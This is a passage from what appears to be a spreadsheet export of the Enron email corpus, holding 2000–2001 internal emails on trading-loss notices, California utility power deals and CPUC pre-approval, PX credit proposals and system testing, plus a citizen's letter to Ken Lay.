 -----Original Message-----_x000D_
From:  Abel, Chris  _x000D_
Sent: Wednesday, June 20, 2001 4:25 PM_x000D_
To: Buy, Rick; Nowlan Jr., John L.; Murphy, Ted; Port, David; Schultz, _x000D_
Cassandra; Shankman, Jeffrey A.; Whalley, Greg_x000D_
Cc: Apollo, Beth; Wilson, Shona; Thibodeaux, Kenneth; Price, Brent A.; Hall, _x000D_
D. Todd; Burns, Jennifer; Romero, Araceli; Taylor, Liz; Wallace, Cassi_x000D_
Subject: Final 6/19/01 Global Products Notification_x000D_
_x000D_
Attached is the Enron Global Markets Global Products Trading notification _x000D_
memo for  5 Day Cumulative Loss for June 19, 2001.  The Office of the _x000D_
Chairman for Enron Global Markets is responsible for printing out a hard copy _x000D_
of this memo, signing it and returning the hard copy to Chris Abel at 3155a, _x000D_
who will forward it to RAC to obtain their signature. _x000D_
_x000D_
Thank You_x000D_
_x000D_
_x000D_
 &lt;&lt; File: 6-19 Global Products 5 Day.doc &gt;&gt; </t>
  </si>
  <si>
    <t>Mon, 6 Mar 2000 03:41:00 -0800 (PST)</t>
  </si>
  <si>
    <t>ISDA w/ Japanese Entity (Itochu}</t>
  </si>
  <si>
    <t>Sara,_x000D_
_x000D_
Looks like the ISDA with the Japanese entity is in your court.  Please advise _x000D_
if you want to review the sample document I had prepared last week.  If not, _x000D_
I will draft a letter to Mr. Wani, so he or some one with his firm can review._x000D_
_x000D_
Thanks</t>
  </si>
  <si>
    <t>Thu, 21 Dec 2000 07:16:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'jeremy.blachman@enron.com', 'david.gorte@enron.com', 'wbradfo@enron.com', 'michael.tribolet@enron.com'})</t>
  </si>
  <si>
    <t>OI</t>
  </si>
  <si>
    <t>Spoke w/ Skilling re OI "binary" decision. He is willing to enter into the _x000D_
deal. His rational is that he thinks we will be ok on OWC in the final _x000D_
analysis. He did  say to reserve for the deal adequately and structure it as _x000D_
appropriate for the circumstances. He also wanted to know if there is _x000D_
anything different here than on OWC. I told him that it wasn't significantly _x000D_
different (both strong underlying businesses with huge event risk attached)_x000D_
_x000D_
Lets get dash completed and then I will voice mail Jeff w/ specifics and get _x000D_
his verbal signature._x000D_
_x000D_
Rick</t>
  </si>
  <si>
    <t>Thu, 14 Sep 2000 08:31:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Re: SDG&amp;E Requirements Deal</t>
  </si>
  <si>
    <t xml:space="preserve">Good points, Chris, and well taken.  _x000D_
_x000D_
The PUC Commisisoners took some heat for their heavy-handed approach at _x000D_
hearings held by Congress on Monday and FERC on Tuesday.  I think those _x000D_
hearings may have loosened things the Commission up at least somewhat, though _x000D_
finding a balance between Commission willingness to grant pre-approval and _x000D_
utility willingness to wear some risk in exchange won't be a cakewalk. _x000D_
_x000D_
We need to remind the Commission that they gave 100 % pre-approved _x000D_
reasonableness for purchases from the PX, and that pre-approval for other _x000D_
purchases is necessary.  That said, I concur that it ain't a gimmee._x000D_
_x000D_
Best,_x000D_
Jeff_x000D_
_x000D_
_x000D_
To: Jeff Dasovich/SFO/EES@EES_x000D_
cc: James D Steffes/HOU/EES@EES _x000D_
Subject: Re: SDG&amp;E Requirements Deal  _x000D_
_x000D_
Jeff:_x000D_
_x000D_
 Re: you comment below that "...they'll be subject to a considerable amount _x000D_
of pressure to pre-approve if a deal is offered that can be show to shield _x000D_
San Diegans from volatility and that looks"attractive."   The CPUC did not _x000D_
pre-approve either SDG&amp;E or SCE recent attempts to buy forward.   I don't _x000D_
think they ever will give pre-granted reasonableness review for purchases.  _x000D_
That is why boith utilites decided not to execute as part of their recent _x000D_
RFPs.  PG&amp;E RFP is up next...I expect more of the same._x000D_
_x000D_
Chris_x000D_
_x000D_
_x000D_
_x000D_
Jeff Dasovich@EES_x000D_
09/14/2000 08:54 AM_x000D_
To: Chris H Foster/HOU/ECT@ECT, James D Steffes/HOU/EES@EES_x000D_
cc:  _x000D_
Subject: Re: SDG&amp;E Requirements Deal  _x000D_
_x000D_
Thanks for the update.  Just want to add that 1) if we're uneasy about _x000D_
wearing the full requirements risk, then focusing on offering a purely _x000D_
wholesale deal can still be very attractive, given SDG&amp;E's blunders w.r.t. _x000D_
procurment wholesale power on behalf of its customers.  And 2) the CPUC has _x000D_
been beat up pretty well for tying the IOUs hands in attempting to hedge, so _x000D_
they'll be subject to a considerable amount of pressure to pre-approve if a _x000D_
deal is offered that can be show to shield San Diegans from volatility and _x000D_
that looks"attractive." _x000D_
_x000D_
Appreciate being kept in the loop on the details.  Thanks._x000D_
_x000D_
Best,_x000D_
Jeff_x000D_
_x000D_
_x000D_
To: James D Steffes/HOU/EES@EES_x000D_
cc: Tim Belden/HOU/ECT@ECT, Greg Wolfe/HOU/ECT@ECT, Jeff Dasovich/SFO/EES@EES _x000D_
Subject: Re: SDG&amp;E Requirements Deal  _x000D_
_x000D_
J_x000D_
_x000D_
I think we could get below $60 on a 5 year deal with a bell shaped load _x000D_
profile at SP-15.  I do not think we can get there for the SDG&amp;E zone.  In _x000D_
fact, I don't think Tim will want to sell the SDG&amp;E zone at all.  If we offer _x000D_
it, it will be at a significant premium to SP-15.  _x000D_
_x000D_
We just showed SCE $58 for a 5 year peak (By the way, like the SDG&amp;E RFP, the _x000D_
SCE RFP resulted in no transactions because they did not get pre-approved _x000D_
reasonableness review and they were too chicken to do it at shareholder _x000D_
risk.  The PG&amp;E RFP for essentially the same deal structure is due tomorrow _x000D_
and we will be responding.  With the PG&amp;E RFP, prices can be changed oon _x000D_
October 11 so  the prices we will show them now are indicative only)._x000D_
_x000D_
Get me that load profile data and I will put together a deal structure.    I _x000D_
wil also be working with the traders to address this "new zone" issue as it _x000D_
exists for all three utilities, not just SDG&amp;E._x000D_
_x000D_
C_x000D_
_x000D_
_x000D_
_x000D_
James D Steffes@EES_x000D_
09/12/2000 07:39 AM_x000D_
To: Chris H Foster/HOU/ECT@ECT_x000D_
cc: thane twiggs _x000D_
Subject: SDG&amp;E Requirements Deal  _x000D_
_x000D_
Chris --_x000D_
_x000D_
I agree with you on the difficulty of a "true" full requirements deal.  I _x000D_
assume what you are talking about is some pre-agreed to 100% load factor _x000D_
energy delivery that could be different for each hour during the year (a sort _x000D_
of "load profile solution").  SDG&amp;E would be responsible for +/- around this _x000D_
delivery?  Maybe offer SDG&amp;E an option on wide variations._x000D_
_x000D_
The other key issue I guess that is important is transmission congestion _x000D_
risk.  Would EPMI be willing to agree to deliver the energy into the SDG&amp;E _x000D_
load zone or just to SP15?  It is my understanding that there is a _x000D_
significant economic difference the SP15 and specific load zones?  Am I _x000D_
correct in my thinking?_x000D_
_x000D_
We probably need to beat $60/Mwh and leave $5/Mwh for the load following.  We _x000D_
may need to go even lower (if possible) to give SDG&amp;E room to recover this _x000D_
summer's high cost of power with the retroactive retail ratemaking back _x000D_
through July 1, 2000._x000D_
_x000D_
On your issue of CPUC approval, that is exactly the play.  We need to walk _x000D_
into the CPUC with an offer that it can't pass up (with or without SDG&amp;E)._x000D_
_x000D_
I've asked Thane Twiggs to get you the appropriate 8760 load profile for _x000D_
SDG&amp;E residential customers.  While the rate deal was broader, we could just _x000D_
supply this customer group._x000D_
_x000D_
I'll call when we have the information._x000D_
_x000D_
Jim_x000D_
_x000D_
_x000D_
_x000D_
To: James D Steffes/HOU/EES@EES_x000D_
cc: Christopher F Calger/PDX/ECT@ECT, Tim Belden/HOU/ECT@ECT _x000D_
Subject: Re: SDG&amp;E Bilateral Authority Delay_x000D_
_x000D_
Jim:_x000D_
_x000D_
A couple thoughts..._x000D_
_x000D_
I don't think Tim would be interested in a true "Full Requirements" deal that _x000D_
would put us at risk for actual load.  If we could define "Full Requirements" _x000D_
as a load profile that has been set ahead of time, and have SDG&amp;E be at risk _x000D_
for deviations from that profile, then I think we would be interested.  With _x000D_
this structure, we could offer a fixed price equal to the weighted average _x000D_
price of their load profile.  If that fixed price was lower than the SDG&amp;E _x000D_
embedded generation cost in rates we might have an angle. "Winning" such a _x000D_
deal still seems like a pretty low probability event, given SDG&amp;E's desire to _x000D_
RFP everything.  However, SDG&amp;E's (and SCE's) main objective seems to be _x000D_
pre-approved reasonableness review.  Since they can't make money on _x000D_
commodity, at least they don't want to lose money.  Maybe we could get the _x000D_
approval of the CPUC? SDG&amp;E wouldn't mind buying from us if this is what it _x000D_
took to get pre-approved reasonableness review.  _x000D_
_x000D_
If someone could get me that load profile information, I would be willing to _x000D_
price it up. _x000D_
_x000D_
Let me know what you think._x000D_
_x000D_
C _x000D_
---------------------- Forwarded by Chris H Foster/HOU/ECT on 09/11/2000 _x000D_
01:09 PM ---------------------------_x000D_
_x000D_
_x000D_
James D Steffes@EES_x000D_
09/11/2000 01:12 PM_x000D_
To: Chris H Foster/HOU/ECT@ECT_x000D_
cc: Christopher F Calger/PDX/ECT@ECT, Tim Belden/HOU/ECT@ECT, David _x000D_
Parquet/SF/ECT@ECT, Jeff Dasovich/SFO/EES@EES, Steven J Kean/NA/Enron@Enron, _x000D_
Mark Palmer/Corp/Enron@ENRON, Richard Shapiro/HOU/EES@EES _x000D_
Subject: Re: SDG&amp;E Bilateral Authority Delay  _x000D_
_x000D_
Chris --_x000D_
_x000D_
Given this development, now may be the right time for Enron to come in and _x000D_
make a "public" offer to SDG&amp;E.  We may be able to put some pressure on the _x000D_
CPUC to approve a full requirements offer that works with the legislative _x000D_
rate cap._x000D_
_x000D_
I'll be in contact with you to discuss._x000D_
_x000D_
Jim_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
To: James D Steffes/HOU/EES@EES, Christopher F Calger/PDX/ECT@ECT, Tim _x000D_
Belden/HOU/ECT@ECT, David Parquet/SF/ECT@ECT, Jeff Dasovich/SFO/EES@EES_x000D_
cc:  _x000D_
Subject: SDG&amp;E Bilateral Authority Delay_x000D_
_x000D_
Surprise, surprise.  _x000D_
_x000D_
SDG&amp;E is afraid to do anything without the pre-approved reasonableness from _x000D_
the CPUC which I don't think will be obtained._x000D_
_x000D_
Chris_x000D_
_x000D_
Chris_x000D_
---------------------- Forwarded by Chris H Foster/HOU/ECT on 09/11/2000 _x000D_
05:59 AM ---------------------------_x000D_
   _x000D_
	Enron Capital &amp; Trade Resources Corp._x000D_
	_x000D_
	From:  "Firooz, Sharon" &lt;SFirooz@SDGE.com&gt;                           _x000D_
09/08/2000 05:32 PM_x000D_
	_x000D_
_x000D_
To: "Hart, Dana" &lt;DHart@SDGE.com&gt;, "'agalatic@internetconnect.net'" _x000D_
&lt;agalatic@internetconnect.net&gt;, "'al_figueroa@vflet.com'" _x000D_
&lt;al_figueroa@vflet.com&gt;, "'bbowman@coral-energy.com'" _x000D_
&lt;bbowman@coral-energy.com&gt;, "'biggsbg@bp.com'" &lt;biggsbg@bp.com&gt;, _x000D_
"'bob_anderson@apses.com'" &lt;bob_anderson@apses.com&gt;, _x000D_
"'ccantor@sempratrading.com'" &lt;ccantor@sempratrading.com&gt;, _x000D_
"'cfoster@enron.com'" &lt;cfoster@enron.com&gt;, "'david_metz@apsc.com'" _x000D_
&lt;david_metz@apsc.com&gt;, "'dcazalet@apx.com'" &lt;dcazalet@apx.com&gt;, _x000D_
"'dgordon@exchange.ml.com'" &lt;dgordon@exchange.ml.com&gt;, _x000D_
"'dirk.andreas@nrgenergy.com'" &lt;dirk.andreas@nrgenergy.com&gt;, _x000D_
"'dparque@ect.enron.com'" &lt;dparque@ect.enron.com&gt;, _x000D_
"'dpenney@coral-energy.com'" &lt;dpenney@coral-energy.com&gt;, _x000D_
"'emaddox@seawestwindpower.com'" &lt;emaddox@seawestwindpower.com&gt;, _x000D_
"'gkosier@newenergy.com'" &lt;gkosier@newenergy.com&gt;, "'gluna@sempra-slns.com'" _x000D_
&lt;gluna@sempra-slns.com&gt;, "'greg.kelly@gen.pge.com'" &lt;greg.kelly@gen.pge.com&gt;, _x000D_
"'hreed@powersrc.com'" &lt;hreed@powersrc.com&gt;, _x000D_
"'jackmcnamara.geothermal@att.net'" &lt;jackmcnamara.geothermal@att.net&gt;, _x000D_
"'james.north@msdw.com'" &lt;james.north@msdw.com&gt;, _x000D_
"'jay.alexander@southernenergy.com'" &lt;jay.alexander@southernenergy.com&gt;, _x000D_
"'jdcoggin@srpnet.com'" &lt;jdcoggin@srpnet.com&gt;, "'jim_staggs@apses.com'" _x000D_
&lt;jim_staggs@apses.com&gt;, "'jivey@utilicorp.com'" &lt;jivey@utilicorp.com&gt;, _x000D_
"'john_h_stout@reliantenergy.com'" &lt;john_h_stout@reliantenergy.com&gt;, _x000D_
"'jon.fischer@pacificorp.com'" &lt;jon.fischer@pacificorp.com&gt;, _x000D_
"'jpmarchand@aep.com'" &lt;jpmarchand@aep.com&gt;, _x000D_
"'Kristen_L_Sullivan@reliantenergy.com'" _x000D_
&lt;Kristen_L_Sullivan@reliantenergy.com&gt;, "'lbryant@pnm.com'" _x000D_
&lt;lbryant@pnm.com&gt;, "'leah.bissonette@williams.com'" _x000D_
&lt;leah.bissonette@williams.com&gt;, "'Lhamilton@avistaenergy.com'" _x000D_
&lt;Lhamilton@avistaenergy.com&gt;, "'marvin_k_ballard@reliantenergy.com'" _x000D_
&lt;marvin_k_ballard@reliantenergy.com&gt;, "'medwar@ladwp.com'" _x000D_
&lt;medwar@ladwp.com&gt;, "'njwa@dynegy.com'" &lt;njwa@dynegy.com&gt;, _x000D_
"'peterc@calpine.com'" &lt;peterc@calpine.com&gt;, "'priced@epenergy.com'" _x000D_
&lt;priced@epenergy.com&gt;, "'pscarpelli@retx.com'" &lt;pscarpelli@retx.com&gt;, _x000D_
"'rproush@duke-energy.com'" &lt;rproush@duke-energy.com&gt;, "'rshimizu@mieco.com'" _x000D_
&lt;rshimizu@mieco.com&gt;, "'sbvanleer@duke-energy.com'" _x000D_
&lt;sbvanleer@duke-energy.com&gt;, "'shapp@caiso.com'" &lt;shapp@caiso.com&gt;, _x000D_
"'stacey.kusters@powerex.com'" &lt;stacey.kusters@powerex.com&gt;, _x000D_
"'szablyal@epenergy.com'" &lt;szablyal@epenergy.com&gt;, _x000D_
"'tmcandrew@statoilenergy.com'" &lt;tmcandrew@statoilenergy.com&gt;_x000D_
cc:  _x000D_
Subject: SDG&amp;E Bilateral Authority Delay_x000D_
_x000D_
_x000D_
SDG&amp;E would like to inform you that  we did not gain authority from the_x000D_
commission on 9/7 and cannot enter into bilateral trades at present; (2) we_x000D_
anticipate receiving that approval on September 21; we will solicit new_x000D_
proposals between now and then and look forward to your continuing_x000D_
participation, as well as your assistance in gaining the necessary_x000D_
regulatory approvals.  Thanks_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>frozenset({'sbmccollum_99@yahoo.com'})</t>
  </si>
  <si>
    <t>Shirley B. McCollum_x000D_
4203 St. Ann_x000D_
New Orleas, LA 70119_x000D_
sbmccollum_99@yahoo.com_x000D_
_x000D_
To Mr. Ken Lay,_x000D_
_x000D_
I'm writing to urge you to donate the millions of dollars you_x000D_
made from selling Enron stock before the company declared_x000D_
bankruptcy to funds, such as Enron Employee Transition Fund and_x000D_
REACH, that benefit the company's employees, who lost their_x000D_
retirement savings, and provide relief to low-income consumers in_x000D_
California, who can't afford to pay their energy bills.  Enron_x000D_
and you made millions out of the pocketbooks of California_x000D_
consumers and from the efforts of your employees._x000D_
_x000D_
Indeed, while you netted well over a $100 million, many of_x000D_
Enron's employees were financially devastated when the company_x000D_
declared bankruptcy and their retirement plans were wiped out._x000D_
And Enron made an astronomical profit during the California_x000D_
energy crisis last year.  As a result, there are thousands of_x000D_
consumers who are unable to pay their basic energy bills and the_x000D_
largest utility in the state is bankrupt._x000D_
_x000D_
The New York Times reported that you sold $101 million worth of_x000D_
Enron stock while aggressively urging the company's employees to_x000D_
keep buying it.  Please donate this money to the funds set up to_x000D_
help repair the lives of those Americans hurt by Enron's_x000D_
underhanded dealin_x000D_
Shirley B. McCollum</t>
  </si>
  <si>
    <t>Mon, 11 Jun 2001 09:18:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'tracy.ngo@enron.com', 'paul.radous@enron.com', 'wendy.conwell@enron.com', 'elizabeth.sager@enron.com', 'edward.sacks@enron.com', 'veronica.gonzalez@enron.com'})</t>
  </si>
  <si>
    <t>West #6452510</t>
  </si>
  <si>
    <t xml:space="preserve">please review for credit approval._x000D_
_x000D_
thank you,_x000D_
Amy_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Tue, 14 Aug 2001 07:06:11 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'susan.mara@enron.com', 'steve.swain@enron.com'})</t>
  </si>
  <si>
    <t>RE: One Other Note on Stranded Costs</t>
  </si>
  <si>
    <t xml:space="preserve">Steve --_x000D_
=20_x000D_
I've stopped trying to understand the Utilities in California and what they=_x000D_
 want - it hurts too much.  But yes, the law allows the Utilities to contin=_x000D_
ue to collect "something" from customers, including DA customers, for QF co=_x000D_
sts beyond 3/31/02._x000D_
=20_x000D_
Jim_x000D_
_x000D_
-----Original Message-----_x000D_
From: Swain, Steve=20_x000D_
Sent: Tuesday, August 14, 2001 8:16 AM_x000D_
To: Steffes, James D.; Mara, Susan_x000D_
Subject: RE: One Other Note on Stranded Costs_x000D_
_x000D_
_x000D_
Let me make sure I understand this.  Prior to April 2002, the UDCs want the=_x000D_
ir QF costs to be as low as possible, since this will cause the PX credit t=_x000D_
o be lower and thus the positive CTC higher.  However, beginning April 2002=_x000D_
, they pray for just the opposite -- the greater their QF costs, the more t=_x000D_
hey can collect from DA customers to help pay for the QFs._x000D_
=20_x000D_
I truly hope I have misunderstood you, else my brain may explode._x000D_
=20_x000D_
=20_x000D_
_x000D_
-----Original Message-----=20_x000D_
From: Steffes, James D.=20_x000D_
Sent: Mon 8/13/2001 5:08 PM=20_x000D_
To: Swain, Steve; Mara, Susan=20_x000D_
Cc:=20_x000D_
Subject: One Other Note on Stranded Costs_x000D_
_x000D_
_x000D_
_x000D_
Steve --=20_x000D_
_x000D_
As Sue highlights below, when people talk about stranded costs ending no la=_x000D_
ter than 3/31/02, they are only speaking about generation-related stranded =_x000D_
costs.  Above market costs for QFs will be "collected" from DA customers fo=_x000D_
r some time into the future.  Wanted to make sure that this was clear._x000D_
_x000D_
Jim=20_x000D_
_x000D_
 -----Original Message-----=20_x000D_
From:   Mara, Susan =20_x000D_
Sent:   Monday, August 13, 2001 12:27 PM=20_x000D_
To:     Curry, Wanda; Swain, Steve; Mellencamp, Lisa; Steffes, James D.; Ru=_x000D_
ffer, Mary Lynne; Tribolet, Michael; Huddleson, Diann_x000D_
_x000D_
Cc:     Gorny, Vladimir; Bradford, William S.; Kingerski, Harry; Savage, Go=_x000D_
rdon; Tribolet, Michael=20_x000D_
Subject:        RE: Summary or PX Credit Proposals=20_x000D_
_x000D_
An update from the meeting we had with SCE on August 9:  SCE said that it h=_x000D_
as TEMPORARILY stopped charging CTC because it doesn't know what to charge =_x000D_
for DWR. Meanwhile, it continues to keep track of the dollar flows through =_x000D_
the TCBA and the new account set up for DWR.  Once the CPUC decides on the =_x000D_
DWR's revenue requirement, SCE expects that it will charge generation-relat=_x000D_
ed CTC again.  There is also continuing CTC related to QF contracts that wi=_x000D_
ll return (and goes beyond 3/31/02) once QF contracts are above the "market=_x000D_
".  SCE is also considering filing a petition with the CPUC to get guidance=_x000D_
 on all these matters. Once the CPUC rules on SCE"s advice letter approache=_x000D_
s, SCE plans to go back and re-bill begining with Jan 18 (it used some diff=_x000D_
erent PX credit approaches early on and switched to this approach for bills=_x000D_
 going out June 4). I didn't ask the question about calculating CTC back to=_x000D_
 Jan 18.  I guess if the DWR rev req is retroactive and leaves room for CTC=_x000D_
, they will bill it.  The other twist I had forgotten about is that they ha=_x000D_
ve a one-half cent charge added to the embedded gen rate of 10.27 cents (ma=_x000D_
king it about 10.77 cents) that collects the $400 million that was uncollec=_x000D_
ted while the CPUC played around with a rate design for the three cent surc=_x000D_
harge.  The half cent addition is for 12 months._x000D_
_x000D_
 -----Original Message-----=20_x000D_
From:   Curry, Wanda =20_x000D_
Sent:   Friday, August 10, 2001 8:51 AM=20_x000D_
To:     Swain, Steve; Mellencamp, Lisa; Steffes, James D.; Ruffer, Mary Lyn=_x000D_
ne; Tribolet, Michael; Huddleson, Diann; Mara, Susan_x000D_
_x000D_
Cc:     Gorny, Vladimir; Bradford, William S.=20_x000D_
Subject:        Summary or PX Credit Proposals=20_x000D_
_x000D_
_x000D_
I wanted to summarize the conclusions from our meeting on Wednesday, August=_x000D_
 8th.  Please let me know if I have misrepresented anything. =20_x000D_
_x000D_
Below is a description of four proposals which may help resolve issues asso=_x000D_
ciated with PX credits or mitigate Enron's exposure to PX credits.  Steve S=_x000D_
wain has the responsibility for evaluating each proposal, and his goal is t=_x000D_
o have recommendations for EWS/EES management on August 14th. =20_x000D_
_x000D_
Current Issues:=20_x000D_
1)  The methodology for calculating PX credits after January 18 is undeterm=_x000D_
ined (SCE and PG&amp;E have implemented different methodologies)_x000D_
_x000D_
2)  Applicability of the 1 cent surcharge to direct access customers (PG&amp;E =_x000D_
is passing thru to DA customers, SCE is not)=20_x000D_
3)  Impact to Enron if  FERC implements  retroactive changes to the CAL PX =_x000D_
clearing prices from Oct 2, 2000 thru January 18th which result in revised =_x000D_
PX credits=20_x000D_
_x000D_
4)  Recoupment of outstanding PX credits against future payments for T&amp;D=20_x000D_
5)  Uncertainty surrounding future tariffs (CTC or other pass through charg=_x000D_
es), making it difficult to hedge price risk in forward positions_x000D_
_x000D_
6)  Large uncollected receivables from both PG&amp;E and SCE=20_x000D_
_x000D_
_x000D_
The four proposals are as follows:=20_x000D_
_x000D_
SCE Recommended Approach=20_x000D_
        This approach assumes no PX (or PE) credit effective from January 1=_x000D_
8, 2001 forward.  Mary Lynne and Diann will work with Steve to quantify the=_x000D_
  gross PX receivable (as billed by each utility)  which would  be reversed=_x000D_
.   This approach will ensure that only charges for T&amp;D (no    generation/c=_x000D_
ommodity costs, CTC charges, or surcharges for CDWR, including the 1 cent) =_x000D_
 will be applicable to Direct Access customers. =20_x000D_
_x000D_
        Enron would request the following:=20_x000D_
        1) Assurances that no surcharges for CDWR will be passed through to=_x000D_
 EES or EEMC=20_x000D_
        2) SCE will support our historical PX  credit receivable as an "all=_x000D_
owable claim" at a minimum and would provide additional credit support if p=_x000D_
ossible. =20_x000D_
_x000D_
        3) PG&amp;E will support Enron's recoupment argument=20_x000D_
        4) Both utilities will immediately reinstate the Cumulative Credit =_x000D_
Balances on utility bills and agree to a netting arrangement at the utility=_x000D_
 parent   level.=20_x000D_
_x000D_
        5) Both utilities agree to not adjust the historical PX credits, if=_x000D_
/when an adjustment of historical PX clearing prices is mandated by FERC=20_x000D_
_x000D_
        Other consideration:=20_x000D_
        Ability to hedge price risk in the retail portfolio, without concer=_x000D_
n re CTC or other surcharge amounts. =20_x000D_
_x000D_
_x000D_
PG&amp;E Recommended Approach=20_x000D_
        This approach assumes the PX calculation methodology effective Janu=_x000D_
ary 18, 2001 would include an "avoided cost"  component.  This avoided cost=_x000D_
 =20_x000D_
_x000D_
        component would include, owned generation, QF purchases, actual CDW=_x000D_
R purchases for the utility, bilateral purchase contracts, and ISO purchase=_x000D_
s.        This resulting "avoided cost" would be used in lieu of the PX cle=_x000D_
aring price in the old PX formula through March, 2002.    If the actual CDW=_x000D_
R purchase  costs are not included, then the surcharge (along with the embe=_x000D_
dded gen costs)  should be included in the calculation. =20_x000D_
_x000D_
       =20_x000D_
        Enron would request the following:=20_x000D_
        Same as above=20_x000D_
_x000D_
        Other Consideration:=20_x000D_
        Enron  would continue to be exposed to "price" risk attributable to=_x000D_
 the actions of the utility at a minimum through March, 2002.  This would h=_x000D_
amper     Enron's ability         to hedge the positions in the retail port=_x000D_
folio.=20_x000D_
_x000D_
Hybrid Approach=20_x000D_
        This approach assumes that the PG&amp;E approach is applicable from Jan=_x000D_
uary 18, 2001 through September 1, 2001 and that the SCE approach is       =_x000D_
  applicable from September 1st forward.   This approach might be necessary=_x000D_
 as a compromise for both utilities to provide their support of the proposa=_x000D_
l.=20_x000D_
_x000D_
        Enron would request the following:=20_x000D_
        Same as SCE and PG&amp;E approach=20_x000D_
_x000D_
        Other considerations:=20_x000D_
        Ability to hedge price risk in the retail portfolio, without concer=_x000D_
n re CTC or other surcharge amounts. =20_x000D_
_x000D_
_x000D_
Enron Model=20_x000D_
        This approach assumes we continue to support a market based (NP15 a=_x000D_
nd SP15) calculation methodology for the PX credit.  =20_x000D_
_x000D_
        Enron would request the following:=20_x000D_
        It is unlikely we would receive any level of cooperation from eithe=_x000D_
r PG&amp;E and SCE.   The consensus from legal, regulatory, and EWS commercial =_x000D_
is        the probability of getting this approach approved is low.   Howev=_x000D_
er, understanding this amount, at a minimum, can be used to help defend the=_x000D_
 "value"    Enron is foregoing in order to reach agreement with the utiliti=_x000D_
es and CPUC._x000D_
_x000D_
        Other considerations:=20_x000D_
        This approach would give Enron the ability to hedge "price" risk, b=_x000D_
ut this is somewhat offset with  incremental credit exposure associated wit=_x000D_
h the     actual collection of the PX credit._x000D_
_x000D_
_x000D_
Again, please let me know if this does not clearly represent what we conclu=_x000D_
ded in Wednesday's meeting.=20_x000D_
_x000D_
Thanks,=20_x000D_
Wanda Curry=20_x000D_
</t>
  </si>
  <si>
    <t>Thu, 6 Jul 2000 09:11:00 -0700 (PDT)</t>
  </si>
  <si>
    <t xml:space="preserve">Jaime:_x000D_
when are you planning on sending this out?  I'm checking with Mark on this _x000D_
but I thought that we would wait until we had seen our counsel's memo before _x000D_
we would issue a press release or send these letters out.  Is that the plan?  _x000D_
Given the ramifications of a press release, I want Mark's input on what it _x000D_
says and when it should be sent out._x000D_
Carol_x000D_
_x000D_
_x000D_
_x000D_
	Jaime Williams@ENRON_x000D_
	07/06/2000 04:01 PM_x000D_
		 _x000D_
		 To: Eric Thode/Corp/Enron@ENRON_x000D_
		 cc: Leonardo Pacheco/Corp/Enron@Enron, Kal Shah/HOU/ECT@ECT, Carol St _x000D_
Clair/HOU/ECT@ECT_x000D_
		 Subject: Cover letter to be sent with the brochures._x000D_
_x000D_
I am sending you the cover letter to be sent out with the brochures....It is _x000D_
a spanish translation of the letter sent to me by the EOL people. _x000D_
Let me know if you guys have any comment...._x000D_
Eric, We need to work on the press release as well... Let me know how can I _x000D_
help on this matter..._x000D_
Thanks and regards. _x000D_
_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Wed, 24 Oct 2001 08:03:09 -0700 (PDT)</t>
  </si>
  <si>
    <t>FW: UAT -- week of 10/22 -- read ASAP</t>
  </si>
  <si>
    <t xml:space="preserve">FYI_x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Invedy, Tantra  _x000D_
Sent:	Wednesday, October 24, 2001 10:02 AM_x000D_
To:	Kroumov, Kroum; Nance, Melissa; Denton, Rhonda L.; Rodriguez, Bernice_x000D_
Subject:	RE: UAT -- week of 10/22 -- read ASAP_x000D_
_x000D_
Just to clarify,_x000D_
_x000D_
PWRTESTN   points to GBLPARA  (which is a replicated database from GDB production)._x000D_
_x000D_
PWRDEVN 	points to GBLTEST._x000D_
_x000D_
Tantra._x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Kroumov, Kroum  _x000D_
Sent:	Wednesday, October 24, 2001 9:58 AM_x000D_
To:	Nance, Melissa; Denton, Rhonda L.; Rodriguez, Bernice_x000D_
Cc:	Invedy, Tantra_x000D_
Subject:	RE: UAT -- week of 10/22 -- read ASAP_x000D_
_x000D_
_x000D_
    After talking to our DBA Tantra, we found out that TESTN points to GBL PARA which_x000D_
    is actually production global data._x000D_
    In that case we can not enter test global data in TESTN where we want to test._x000D_
    Tantra said that we can use DEVN for global test data, my impression is that we need _x000D_
    to use TESTN however_x000D_
_x000D_
   _x000D_
_x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Nance, Melissa  _x000D_
Sent:	Wednesday, October 24, 2001 9:27 AM_x000D_
To:	Denton, Rhonda L.; Rodriguez, Bernice; Robinson, Rhonda; Pham, Vivien; Richardson, Stacey; Lew, Elsie; Hilliard, Marlene; Robinson, Rhonda; Price, Wade R.; Spears, Christopher; Miroballi, Angelo; Heaney, Gordon; Pinion, Richard; Pham, Vivien; Olvey, David; McDowell, Shirley_x000D_
Cc:	Crooks, William; Kroumov, Kroum_x000D_
Subject:	RE: UAT -- week of 10/22 -- read ASAP_x000D_
Importance:	High_x000D_
_x000D_
Sorry -- one more request._x000D_
_x000D_
I know a few of the Global users have tested this week.  Please provide me an update on the following. _x000D_
_x000D_
To all Global users:  If you have tested this week -- have you been sending your test scripts to your Unify users so they can verify the information has been replicated?  Also, give me an update if the scripts were run for Financial, Gas or Power._x000D_
_x000D_
To all Unify users:  If you have received test scripts (this week) have you verified the information was replicated?  If so, is it there?_x000D_
_x000D_
If you are unaware what you are to be testing -- please let me know and I will send you the spreadsheet again._x000D_
_x000D_
Regards,_x000D_
Melissa_x000D_
(x54889)_x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Denton, Rhonda L.  _x000D_
Sent:	Wednesday, October 24, 2001 9:10 AM_x000D_
To:	Rodriguez, Bernice; Robinson, Rhonda; Nance, Melissa; Pham, Vivien; Richardson, Stacey; Lew, Elsie; Hilliard, Marlene; Robinson, Rhonda; Price, Wade R.; Spears, Christopher; Miroballi, Angelo; Heaney, Gordon; Pinion, Richard; Pham, Vivien; Olvey, David; McDowell, Shirley_x000D_
Cc:	Crooks, William; Kroumov, Kroum_x000D_
